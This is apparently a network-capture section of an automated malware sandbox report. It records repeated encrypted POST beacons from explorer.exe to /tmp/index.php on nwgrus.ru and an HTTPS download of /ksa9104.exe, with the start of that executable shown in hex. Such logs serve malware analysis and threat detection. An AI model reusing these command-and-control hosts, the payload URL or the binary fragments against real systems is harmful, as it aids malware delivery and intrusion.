Oct 3, 2024 12:28:20.076170921 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kaqmpmaijfnk.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 293 Host: nwgrus.ru
Oct 3, 2024 12:28:20.076190948 CEST	293	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 48 0b d3 bd Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vuH$v\|Z/_WJ[gKZ?;@l'.@o]e4~Q+3i1,I<~wglY:Vof ?^~
Oct 3, 2024 12:28:21.566986084 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:28:21 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49784	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:29:29.785671949 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gyvqqphlebcxdpkv.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 351 Host: nwgrus.ru
Oct 3, 2024 12:29:29.785707951 CEST	351	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 23 03 a6 80 Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA .[k,vu#q-YS\|{ u^6*9To`&V_3.$ oDRZ1Wv!\|jVR,1@u05Ql\|n:~@m2TQ
Oct 3, 2024 12:29:31.304580927 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:29:30 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49785	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:29:36.320461988 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ljhchdbaaaxer.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 332 Host: nwgrus.ru
Oct 3, 2024 12:29:36.320506096 CEST	332	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 44 5c c1 a3 Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA .[k,vuD\EHpmr%M.?k(k47\M*rn6rFA#<q,}^^6%KV]_7MuL>Ucj_iDE=
Oct 3, 2024 12:29:38.126115084 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:29:37 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49786	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:29:44.101727009 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gjsnmktycknrotm.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 245 Host: nwgrus.ru
Oct 3, 2024 12:29:44.101746082 CEST	245	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 25 08 b9 b8 Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA .[k,vu%C~u"7c[KcZM~O1Hf'NndI/asMUBUi3"S&k.5kbTkS!\|XHF6
Oct 3, 2024 12:29:46.810496092 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:29:46 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49787	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:29:53.764369011 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gtnnfkxyrnmdua.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 312 Host: nwgrus.ru
Oct 3, 2024 12:29:53.764405012 CEST	312	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 35 25 e1 a1 Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA .[k,vu5%I[mc?{C&h>LNKtc! J$/^!OD-k}GS42.iSc=foD_8cuiZR\-6
Oct 3, 2024 12:29:58.317342043 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:29:55 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49788	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:30:10.975163937 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gjxqibcjarykr.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 133 Host: nwgrus.ru
Oct 3, 2024 12:30:10.975222111 CEST	133	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 21 1b fd 8c Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA .[k,vu!PzeuuJ r7V,ruOR!
Oct 3, 2024 12:30:12.094862938 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:30:11 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Oct 3, 2024 12:30:12.095027924 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:30:11 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49790	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:30:20.006772995 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lwriihoulvmts.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 173 Host: nwgrus.ru
Oct 3, 2024 12:30:20.006814003 CEST	173	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 27 0d bd 81 Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA .[k,vu'wan)P;{gE 1X&W?U+(&9^SG"7^k-B.Q/
Oct 3, 2024 12:30:20.785784006 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:30:20 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49792	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:30:37.647725105 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nfjjiuyrybf.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 302 Host: nwgrus.ru
Oct 3, 2024 12:30:37.647758007 CEST	302	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 40 32 e9 a7 Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA .[k,vu@2b4Gu{be@\j6%DF>\|dVW-MUkg[+0)< Q5FFt6=e_s/nnz"5cY3V&
Oct 3, 2024 12:30:38.457832098 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:30:38 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49794	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:30:54.839607954 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xtbardaliciv.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 341 Host: nwgrus.ru
Oct 3, 2024 12:30:54.839627981 CEST	341	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 70 36 a7 95 Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA .[k,vup6` R[z5B&'secp)A)2)I!8a6T==-!}#W}us~:qCtmJV. Abu* #
Oct 3, 2024 12:30:55.625368118 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:30:55 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49762	23.145.40.164	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 10:28:16 UTC	162	OUT	GET /ksa9104.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 23.145.40.164
2024-10-03 10:28:16 UTC	327	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 10:28:16 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff Last-Modified: Thu, 03 Oct 2024 10:00:02 GMT ETag: "62200-6238f9e42717b" Accept-Ranges: bytes Content-Length: 401920 Connection: close Content-Type: application/x-msdos-program
2024-10-03 10:28:16 UTC	7865	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d3 5f 1a 3c 97 3e 74 6f 97 3e 74 6f 97 3e 74 6f f8 48 ea 6f b7 3e 74 6f f8 48 df 6f be 3e 74 6f f8 48 de 6f eb 3e 74 6f 9e 46 e7 6f 9c 3e 74 6f 97 3e 75 6f 06 3e 74 6f f8 48 db 6f 96 3e 74 6f f8 48 ee 6f 96 3e 74 6f f8 48 e9 6f 96 3e 74 6f 52 69 63 68 97 3e 74 6f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e1 cb 4a 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 12 04 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$_<>to>to>toHo>toHo>toHo>toFo>to>uo>toHo>toHo>toHo>toRich>toPELJe
2024-10-03 10:28:16 UTC	8000	IN	Data Raw: 00 6e 00 6b 00 6e 00 6f 00 77 00 6e 00 3e 00 00 00 00 00 52 00 75 00 6e 00 74 00 69 00 6d 00 65 00 20 00 45 00 72 00 72 00 6f 00 72 00 21 00 0a 00 0a 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 3a 00 20 00 00 00 05 00 00 c0 0b 00 00 00 00 00 00 00 1d 00 00 c0 04 00 00 00 00 00 00 00 96 00 00 c0 04 00 00 00 00 00 00 00 8d 00 00 c0 08 00 00 00 00 00 00 00 8e 00 00 c0 08 00 00 00 00 00 00 00 8f 00 00 c0 08 00 00 00 00 00 00 00 90 00 00 c0 08 00 00 00 00 00 00 00 91 00 00 c0 08 00 00 00 00 00 00 00 92 00 00 c0 08 00 00 00 00 00 00 00 93 00 00 c0 08 00 00 00 00 00 00 00 b4 02 00 c0 08 00 00 00 00 00 00 00 b5 02 00 c0 08 00 00 00 00 00 00 00 03 00 00 00 09 00 00 00 90 00 00 00 0c 00 00 00 00 00 00 00 d3 7b 43 00 14 0c 43 00 dd 79 43 00 c9 29 43 00 62 61 64 20 Data Ascii: nknown>Runtime Error!Program: {CCyC)Cbad
2024-10-03 10:28:16 UTC	8000	IN	Data Raw: 13 8b 6e 1e 75 35 3e 00 00 00 00 00 60 1e 40 00 00 00 8c d9 0b f7 3f fd b2 d4 60 86 2c 2b 3e 00 00 00 00 00 80 1e 40 00 00 00 64 01 0e f7 3f 9a b4 e5 0b 05 c6 35 3e 00 00 00 00 00 a0 1e 40 00 00 00 d4 24 10 f7 3f 6c 01 b1 d6 19 20 20 3e 00 00 00 00 00 c0 1e 40 00 00 00 e4 43 12 f7 3f 7e 7f 2b 5e 97 88 4d 3e 00 00 00 00 00 e0 1e 40 00 00 00 ac 5e 14 f7 3f d1 50 4b c0 51 44 00 3e 00 00 00 00 00 00 1f 40 00 00 00 2c 75 16 f7 3f 5e 7b e8 0f 23 74 46 3e 00 00 00 00 00 20 1f 40 00 00 00 7c 87 18 f7 3f e3 5e 34 4b d1 cb 20 3e 00 00 00 00 00 40 1f 40 00 00 00 a0 95 1a f7 3f 85 ee 34 a2 4f 0a 3e 3e 00 00 00 00 00 60 1f 40 00 00 00 a8 9f 1c f7 3f 58 45 da 93 a5 20 4a 3e 00 00 00 00 00 80 1f 40 00 00 00 a4 a5 1e f7 3f 28 c7 67 d4 b9 d1 2c 3e 00 00 00 00 00 a0 1f 40 Data Ascii: nu5>`@?`,+>@d?5>@$?l >@C?~+^M>@^?PKQD>@,u?^{#tF> @\|?^4K >@@?4O>>`@?XE J>@?(g,>@
2024-10-03 10:28:16 UTC	8000	IN	Data Raw: 0d 67 fd b3 81 1b 88 9b 65 ca 1f 30 5e 8b 7a f4 e1 ca 28 27 24 b7 40 58 a9 05 8d f8 55 f7 a1 c4 17 cf 96 b7 44 63 e4 bb 5f d0 a1 98 1d a7 20 7a ed be 80 3c 54 2f 3a a0 8b c0 fc d2 77 1e 16 85 fc d6 13 8c 9a 18 fb dd 85 ad a8 68 6f 7d 32 63 a7 ab c6 1d a2 bd bf e7 27 44 ee b5 82 92 a8 a0 b8 da 1c f1 ed 2f 25 4b bd 58 16 45 80 fe 63 22 5c 15 81 ab bb c1 8c db 26 27 b8 82 1a bb 6c 06 2c a2 bb da 9b 47 54 d3 09 d5 77 63 ed de a5 35 c9 18 c3 6f 26 02 ce 95 97 71 80 42 39 59 52 3f b7 6f e3 82 5c a4 68 0e 65 aa a1 8e 96 36 e3 ae 57 20 92 9c a9 9b 56 85 92 76 4c a7 36 c3 e7 36 9c 32 4f b4 9a 93 e9 94 f2 b4 96 bb f5 38 b7 34 ae 2a 91 ac a0 56 ae 5f d5 e8 cb bb b5 6d 43 b2 b5 ed 30 ac 5c 48 8e c0 81 3f 86 79 d6 47 d5 f6 1a 8f 10 9f 15 d7 85 1f 74 cb ec df fa dc 56 Data Ascii: ge0^z('$@XUDc_ z<T/:who}2c'D/%KXEc"\&'l,GTwc5o&qB9YR?o\he6W VvL662O84*V_mC0\H?yGtV
2024-10-03 10:28:16 UTC	8000	IN	Data Raw: 04 c9 5e 19 7e a9 52 3e bd b2 b0 38 57 49 11 b7 f9 66 d7 ea 9d 19 77 80 f3 b8 32 78 f2 35 fc 65 32 ab bc 07 87 b2 35 ff 42 ca f6 d4 d6 f7 58 88 7d 5b 9a ec 68 c3 e9 87 e8 cd a9 a6 bc ca e6 bf c1 6f 09 61 30 54 cb b3 ac 2b 5f 75 c7 2e 24 7a 64 e3 fa bb 5c 59 63 a0 0c a4 58 5d 9b ef 9a 30 3a 6a 51 0c c4 5b 4c 2b 37 d1 06 ee 50 61 5c c8 5e 57 88 e6 e7 fa 9c f7 6a b5 c3 c7 f5 b8 4a e7 30 71 c8 b6 68 79 39 f1 75 5b 2d ba f1 14 90 28 79 7a 97 78 c1 5c 44 15 01 1f 7a f5 70 cc bf b6 83 f8 00 63 0b 4d 5a ff 7f 59 61 df a4 db 7c 1d 4a 6b d8 fa 7c 80 7d 56 9c f1 4b 38 c5 67 19 c4 04 d5 6c e2 90 08 31 de b5 f6 23 92 ba 79 8f 81 c5 0f 52 a1 28 eb 50 88 d2 98 f8 22 8b e3 b2 76 ae 35 58 93 2e fb 36 c6 17 f0 53 cf 93 be 08 d2 97 ab 82 b6 c1 8e 26 c8 92 c2 17 f7 c6 a7 42 Data Ascii: ^~R>8WIfw2x5e25BX}[hoa0T+_u.$zd\YcX]0:jQ[L+7Pa\^WjJ0qhy9u[-(yzx\DzpcMZYa\|Jk\|}VK8gl1#yR(P"v5X.6S&B
2024-10-03 10:28:16 UTC	8000	IN	Data Raw: db 02 15 ff 46 07 e0 f5 17 99 45 32 ff 33 0e 54 c8 86 84 e5 5a 8a 7b df 3b 58 84 e7 dd 82 72 6f 7d 70 5b 31 b6 5a 93 b4 94 15 e0 e2 28 43 25 60 a5 5b 18 5d d4 d7 94 15 40 93 d0 02 66 e9 67 9c d2 70 af 18 5a 52 bf df 9f d3 9a 42 70 d7 41 c9 31 aa 12 3a 1c 75 03 49 a6 6c be 90 71 af 36 da ef fe 48 28 96 fe 87 7a 2d d8 96 48 3d ff ec b1 51 e3 ee 81 45 53 ad 9f cf e9 72 b0 fa 52 f9 73 ca f9 dc b1 8b ca b6 44 b8 c5 36 ea 15 26 9a c4 35 cb 4c 4f 20 57 b5 71 84 52 70 65 09 f7 09 2c 56 63 1d 08 29 2d 29 bf d1 d3 79 32 79 7e b2 6d cb a9 cf 14 7a ac 6e 7f 1c 46 ba 74 8d d9 e8 dd f4 37 d6 06 bb e0 8a 90 17 ab 18 b9 37 9a cb aa 98 5e 03 c9 0d 28 0b fd 6c 8c 8b 07 26 0d 08 71 e2 5f 23 24 34 c0 59 87 a8 e3 bd 6a 20 e7 20 95 5c 71 e1 8e 18 0c 0a 8d 04 d7 90 ae 5c f3 29 Data Ascii: FE23TZ{;Xro}p[1Z(C%`[]@fgpZRBpA1:uIlq6H(z-H=QESrRsD6&5LO WqRpe,Vc)-)y2y~mznFt77^(l&q_#$4Yj \q\)
2024-10-03 10:28:16 UTC	8000	IN	Data Raw: 7c 71 24 72 27 77 c2 21 c1 04 b9 33 b7 d5 c5 52 e1 94 b7 90 09 5a 6e d0 aa 24 a3 68 3c 1d d0 96 b8 8a 17 ad 07 f7 b6 04 a6 7a e0 e2 49 bd dd 92 81 5e 9f 2a 09 19 45 ef c9 f4 5d b4 c7 ef 07 a7 22 a1 29 3b 2c 00 42 eb 43 0b 29 e6 01 db 7e af cc ad f7 c2 03 8e 31 8d 2f 54 77 7d 1b 00 5d bc 90 88 31 7d af a0 0e 89 89 c8 fa 73 79 d9 c5 cd 99 5e 01 c5 65 96 5d 3a fe dc 4e 0b 20 ae ef aa 6f 30 7d f5 18 bd 98 b8 b6 38 51 02 34 06 6a 67 15 d7 84 a2 f3 a7 1d 44 cf f2 c9 f0 b9 d1 b0 af 13 77 6b 33 27 b6 e3 8c 65 88 0e 6d 4c 6d ad 77 b1 f9 55 59 09 cc 6e 3c 84 f1 02 be a8 df ba c5 22 bb fa 4c 2f 58 a7 64 6b 63 ea de 0b 76 c0 13 70 24 da cd 6d 79 c1 03 a1 09 01 77 8e ac 35 a7 10 2e 7f 48 0e 8f 4f 6e bc e1 79 58 8d 63 e4 d6 da 19 8b 04 f9 56 eb 46 da 55 e5 7a 23 65 d6 Data Ascii: \|q$r'w!3RZn$h<zI^*E]");,BC)~1/Tw}]1}sy^e]:N o0}8Q4jgDwk3'emLmwUYn<"L/Xdkcvp$myw5.HOnyXcVFUz#e
2024-10-03 10:28:16 UTC	8000	IN	Data Raw: fd fc 70 fb 51 fe f0 86 fe 61 f2 bc b9 9f 1a 6e 30 a8 25 16 08 27 0d 2f 6b 73 d1 3a 88 a8 43 a0 ee 73 49 a4 aa 78 71 c7 e2 35 77 5f 79 36 e6 0d 9e c5 9b 58 38 4c d5 b3 94 9b 00 f5 99 80 c3 0e 21 1f 01 88 37 dc 95 50 83 a7 7e 55 4a 86 06 52 5c de 31 63 03 03 3e 26 59 b8 9b 3f ea a2 38 8c f1 ee 8e 25 3c 36 d6 85 83 7d 75 bb ad 95 57 2b 93 15 cb 6d 11 1d eb 38 47 cc d7 1b 03 ae 52 e1 86 0b da bd 40 5d 6a c0 e3 d4 02 0e 92 ee 46 b0 32 09 5a 4f 57 ba 44 cc 8a 5b a2 14 a3 4d 94 9f 05 21 f2 e2 3a 01 89 ad 34 ae 98 1a b0 8d 31 87 21 f5 fb 75 44 50 ba 47 70 72 c7 08 4f 9c 47 f3 96 3f e0 34 97 7c fd 13 18 6d f2 a6 95 60 f7 54 9f d8 1b 25 69 6c c7 e7 47 6c f0 d1 16 b7 30 bd 50 a6 9c 30 22 b3 97 7a 02 7f f8 91 f8 c2 05 ec 7d ef 19 d6 14 96 8c 61 76 c1 9e c1 2c 8e 2f Data Ascii: pQan0%'/ks:CsIxq5w_y6X8L!7P~UJR\1c>&Y?8%<6}uW+m8GR@]jF2ZOWD[M!:41!uDPGprOG?4\|m`T%ilGl0P0"z}av,/
2024-10-03 10:28:16 UTC	8000	IN	Data Raw: 7a 6e 87 48 a5 e9 a6 2c c1 74 b4 2d 63 f8 20 a6 f8 8b 52 5f b3 c7 97 e7 33 af 1c 3a 77 6d 1c 60 d2 f9 0d dc 66 f6 c3 42 e4 bd e2 f0 f5 ba ab 21 0d 16 a5 b0 9b 95 9a ee b5 cc 14 80 cc 1a 96 a0 08 b5 bd 50 d9 56 d2 3a 98 be e2 29 e2 f9 08 57 1f 23 4e c6 0a 2f 84 28 11 a0 48 e4 98 f3 86 75 fb 2b b7 ad 1e 50 23 b0 8e 6d 9a 02 9f d5 89 33 24 51 d5 8f 84 24 01 07 15 03 ca 6c bc 06 c6 0d f2 7e 86 05 6d d5 8a 52 64 49 e8 5a 6d f0 89 ef 41 b4 13 32 06 43 e4 41 09 33 ba b7 3e b8 40 7b cd af 60 f7 74 2d ab 04 f8 41 cf b8 e9 4c ad d5 3e f7 39 f9 49 31 d2 f5 61 67 43 2a 21 d9 a9 5a 7e aa 51 5d 1c 23 af fe 4c 04 07 cc 2e b8 ec ab 6e ad db 29 84 0c 62 68 f4 56 85 9f 2d 3c 72 ef 2f 79 d9 b6 a9 a7 ff 69 db 37 e4 5c fb f1 1b e2 b7 83 97 92 ee 06 04 5b 7b df e3 ba c0 93 d7 Data Ascii: znH,t-c R_3:wm`fB!PV:)W#N/(Hu+P#m3$Q$l~mRdIZmA2CA3>@{`t-AL>9I1agC*!Z~Q]#L.n)bhV-<r/yi7\[{
